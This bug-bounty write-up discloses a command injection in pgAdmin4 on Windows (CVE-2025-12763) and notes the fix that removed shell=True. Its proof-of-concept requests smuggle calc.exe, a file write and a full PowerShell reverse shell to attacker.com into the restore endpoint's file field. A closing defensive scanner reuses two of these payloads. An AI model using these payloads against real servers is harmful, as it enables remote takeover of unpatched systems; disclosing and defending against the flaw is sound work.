    Command Injection in pgAdmin for Windows (CVE-2025-12763)
    Bug Bounty 2025. 11. 19. 00:10

    Summary


    A command injection vulnerability exists in pgAdmin4 running on Windows because subprocess.Popen() is called with shell=True when the backup/restore background processes are launched. An attacker can execute arbitrary system commands through the file path input.

    Details


    Steps to reproduce:

    1. Log in to pgAdmin4 on a Windows environment
    2. Connect to a database server
    3. Select the Restore function
    4. Send the following body to the POST /restore/job/<server_id> endpoint:

    {
        "file": "backup.sql & calc.exe",
        "format": "custom",
        "database": "testdb"
    }

    5. Windows Calculator is executed, confirming that arbitrary command execution is possible


    Issue Code:

    web/pgadmin/misc/bgprocess/process_executor.py (Line 319-330):

    # Imports assumed from the module header (not part of the quoted excerpt):
    import os
    from subprocess import Popen, PIPE

    _IS_WIN = (os.name == 'nt')

    def execute(argv):
        """
        This function will execute the background process
        """
        command = argv[1:]  # argv[0] is the executor script itself; the rest is the utility command line
        args = dict()

        # ... skip ...

        kwargs = dict()
        kwargs['close_fds'] = False
        kwargs['shell'] = True if _IS_WIN else False  # <-- Vulnerability: shell=True on Windows
        kwargs['env'] = os.environ.copy()

        # With shell=True on Windows, Popen wraps the command in "cmd.exe /c ..."
        process = Popen(
            command, stdout=PIPE, stderr=PIPE, stdin=None, **kwargs
        )

    web/pgadmin/misc/bgprocess/processes.py (Line 346-354):

    # Imports assumed from the module header (not part of the quoted excerpt):
    import os
    from subprocess import Popen

    if os.name == 'nt':  # Windows
        DETACHED_PROCESS = 0x00000008
        from subprocess import CREATE_NEW_PROCESS_GROUP

        # ... skip ...
        # (cmd, env, stdout, stderr and stdin are built in the elided part;
        #  cmd is the command line that carries the user-supplied file path)

        p = Popen(
            cmd,  # cmd contains user input
            close_fds=False,
            env=env,
            stdout=stdout.fileno(),
            stderr=stderr.fileno(),
            stdin=stdin.fileno(),
            creationflags=(CREATE_NEW_PROCESS_GROUP | DETACHED_PROCESS)
        )

    When shell=True is used on Windows, the command is executed through cmd.exe /c, which interprets shell metacharacters (&, |, ;, &&, ||). Because the user-supplied file path is not validated before it reaches cmd.exe, command injection is possible.

    Proof of Concept (PoC) - Calculator Execution


    1. Simple Command Execution (Calculator)

    POST /restore/job/1
    {
        "file": "C:\\backup.sql & calc.exe",
        "format": "custom",
        "database": "postgres"
    }

    Result: Windows Calculator is executed

    2. File Creation

    POST /restore/job/1
    {
        "file": "backup.sql & echo HACKED > C:\\Windows\\Temp\\poc.txt",
        "format": "custom",
        "database": "postgres"
    }

    Result: C:\Windows\Temp\poc.txt file is created with "HACKED" content

    Proof of Concept (PoC) - Reverse Shell


    PowerShell Reverse Shell

    POST /restore/job/1
    {
        "file": "backup.sql & powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
        "format": "custom",
        "database": "postgres"
    }

    Impact


    Authenticated attackers can execute arbitrary commands on Windows systems.

    Remediation

    In the patched version 9.10, the vulnerability was addressed by removing the shell=True option.
    https://github.com/pgadmin-org/pgadmin4/commit/e374edc69239b3e02ecde895e27d9f9e488b87ee
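    The following is an added example (not pgAdmin's code and not from the commit above) that models the mechanism described here from the defender's side: it rebuilds the command line CPython's Popen hands to the OS on Windows with and without shell=True, so the extra cmd.exe parsing step is visible, and it adds an input check and a scanner over constructed /restore/job request bodies. The pg_restore argv layout, the metacharacter set beyond the ones named above, and the sample bodies are assumptions.

```python
import json
import re
from subprocess import list2cmdline
# Operators cmd.exe parses in a command line. The page names & | ; && ||;
# the redirection/expansion characters added here are an assumption.
CMD_METACHARS = re.compile(r'[&|;<>^%!\r\n]')

def restore_argv(file_path, database):
    """Assumed argv shape for the restore utility; pgAdmin's real one differs."""
    return ['pg_restore.exe', '--dbname', database, '--format', 'custom', file_path]

def command_line_for(argv, shell):
    """Rebuild what CPython's Popen hands to the OS on Windows (COMSPEC=cmd.exe).
    shell=True : cmd.exe /c "<joined argv>"; cmd.exe re-parses the whole text,
                 so an operator inside the file path is honoured.
    shell=False: the joined argv goes to CreateProcess; no interpreter inspects it."""
    joined = list2cmdline(argv)
    return 'cmd.exe /c "{}"'.format(joined) if shell else joined

def check_restore_file(file_path):
    """Defence in depth on top of shell=False: reject paths carrying cmd operators."""
    return CMD_METACHARS.search(file_path) is None

def scan_restore_requests(bodies):
    """Flag /restore/job request bodies whose 'file' value carries cmd.exe operators.
    Returns [(index, file_path), ...] for the suspicious ones."""
    flagged = []
    for idx, raw in enumerate(bodies):
        try:
            body = json.loads(raw)
        except ValueError:
            continue  # not JSON, nothing to inspect here
        path = body.get('file')
        if isinstance(path, str) and not check_restore_file(path):
            flagged.append((idx, path))
    return flagged

# Constructed sample bodies: one benign restore and two taken from the PoCs above.
SAMPLE_BODIES = [
    '{"file": "C:\\\\backups\\\\nightly.dump", "format": "custom", "database": "postgres"}',
    '{"file": "C:\\\\backup.sql & calc.exe", "format": "custom", "database": "postgres"}',
    '{"file": "backup.sql & echo HACKED > C:\\\\Windows\\\\Temp\\\\poc.txt", "format": "custom", "database": "postgres"}',
]

if __name__ == '__main__':
    for idx, path in scan_restore_requests(SAMPLE_BODIES):
        print('request %d flagged: %r' % (idx, path))
        print('  shell=True  ->', command_line_for(restore_argv(path, 'postgres'), True))
        print('  shell=False ->', command_line_for(restore_argv(path, 'postgres'), False))
```

Running it prints, for each flagged body, the cmd.exe /c wrapper that the old shell=True code produced next to the plain argument vector the patched shell=False code passes, where the file path is a single quoted argument.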

